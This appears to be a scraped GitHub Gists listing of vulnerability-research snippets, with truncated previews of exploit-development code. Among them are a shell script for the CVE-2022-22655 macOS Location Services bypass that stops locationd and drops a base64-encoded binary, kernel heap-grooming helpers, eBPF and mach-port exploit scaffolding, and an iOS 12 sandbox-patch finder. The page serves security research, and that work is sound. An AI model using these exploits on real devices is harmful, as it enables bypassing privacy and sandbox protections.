-
- #iot
- #chrome-and-friends: Chrome, V8, Blink, Mojo, etc.
- Linux kernel #todo
- expdev #todo
- fuzzing #todo
tin-z
/ VR_roadmap.md
Last active
March 26, 2025 06:33
Becoming a Vulnerability Researcher roadmap: my personal experience
theevilbit
/ cve_2022_22655_mount_locationd.sh
Last active
December 12, 2024 17:59
CVE-2022-22655 - macOS Location Services Bypass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/zsh | |
| echo "++ Stopping locationd" | |
| sudo launchctl stop com.apple.locationd | |
| echo "++ Dropping swiftliverpool" | |
| echo z/rt/gcAAAEDAAAAAgAAAB4AAACwDQAAhQAgAAAAAAAZAAAASAAAAF9fUEFHRVpFUk8AAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAA+AQAAF9fVEVYVAAAAAAAAAAAAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAUAAAAFAAAADwAAAAAAAABfX3RleHQAAAAAAAAAAAAAX19URVhUAAAAAAAAAAAAALAtAAABAAAAa0AAAAAAAACwLQAABAAAAAAAAAAAAAAAAAQAgAAAAAAAAAAAAAAAAF9fc3R1YnMAAAAAAAAAAABfX1RFWFQAAAAAAAAAAAAAHG4AAAEAAACiAAAAAAAAABxuAAABAAAAAAAAAAAAAAAIBACAAAAAAAYAAAAAAAAAX19zdHViX2hlbHBlcgAAAF9fVEVYVAAAAAAAAAAAAADAbgAAAQAAAB4BAAAAAAAAwG4AAAIAAAAAAAAAAAAAAAAEAIAAAAAAAAAAAAAAAABfX2NvbnN0AAAAAAAAAAAAX19URVhUAAAAAAAAAAAAAOBvAAABAAAALgEAAAAAAADgbwAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF9fc3dpZnQ1X3R5cGVyZWZfX1RFWFQAAAAAAAAAAAAADnEAAAEAAAAkAAAAAAAAAA5xAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX19vYmpjX21ldGhuYW1lAF9fVEVYVAAAAAAAAAAAAAAycQAAAQAAACwBAAAAAAAAMnEAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAABfX2NzdHJpbmcAAAAAAAAAX19UR |
pagabuc
/ extract_offsets.py
Created
August 18, 2022 02:07
Find kernel objects containing function pointers
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Written by pagabuc, run with the following: | |
| # gdb --batch --nx -q -x extract_offsets.py ./vmlinux | |
| # This script finds kernel objects that contain function pointers and with size between 1024 and 2048. | |
| # Nested structure types are traversed recursively. | |
| import gdb | |
| import re | |
| struct_regex = re.compile("(struct [a-zA-Z0-9_]*)") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdlib.h> | |
| #include <stdio.h> | |
| #include <pthread/pthread.h> | |
| #include <mach/mach.h> | |
| struct ool_msg { | |
| mach_msg_header_t hdr; | |
| mach_msg_body_t body; | |
| mach_msg_ool_ports_descriptor_t ool_ports[]; | |
| }; |
PsychoTea
/ ImportR2File.py
Created
October 27, 2020 21:04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import idc | |
| def define_func(addr, name): | |
| idc.MakeCode(addr) | |
| idc.MakeFunction(addr) | |
| idc.MakeNameEx(addr, name, idc.SN_NOWARN) | |
| print("%s @ %s" % (name, hex(addr))) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _GNU_SOURCE | |
| #include <err.h> | |
| #include <stdint.h> | |
| #include <linux/bpf.h> | |
| #include <linux/filter.h> | |
| #include <stdio.h> | |
| #include <unistd.h> | |
| #include <sys/syscall.h> | |
| #include <asm/unistd_64.h> | |
| #include <sys/types.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #if 0 | |
| Reported : 19-Jan-2020 | |
| Fixed in iOS 13.4 with CVE-2020-9768 | |
| AppleJPEGDriverUserClient : mach port use-after-free/type-confusion via race condition | |
| AppleJPEGDriverUserClient external methods can be used synchronously or asynchronously, when used asynchronously, | |
| it brings the registered mach port (via registerNotificationPort()) and put it inside jpegRequest data structure, | |
| and no reference count was taken for this operation. since registerNotificationPort() is not gated, it is | |
| possible to release the port (if the port got substituted) during the processing of jpeg request and end up | |
| with dangling pointer passed to _mach_msg_send_from_kernel_proper(). |
zcutlip
/ lldb-hand-rolled-headers.md
Last active
February 7, 2025 01:39
Importing Hand-Rolled C Header Files in LLDB
PsychoTea
/ PanicParser.py
Last active
June 11, 2023 19:54
A collection of useful iOS-related scripts
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import json | |
| import re | |
| kslide = 0x0 | |
| if len(sys.argv) < 2: | |
| print("Usage: PanicParser.py [file path]") | |
| exit() |
jakeajames
/ patchfinder64.c
Last active
February 1, 2025 22:34
"kppless" sandbox profile patch for iOS 12
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| addr_t Find_platform_profile() { | |
| uint64_t string = Find_strref("\"failed to initialize platform sandbox", 1, 0, false); | |
| if (!string) { | |
| string = Find_strref("\"failed to initialize platform sandbox", 1, 1, false); | |
| if (!string) { | |
| return 0; | |
| } | |
| } | |
| string -= KernDumpBase; | |
NewerOlder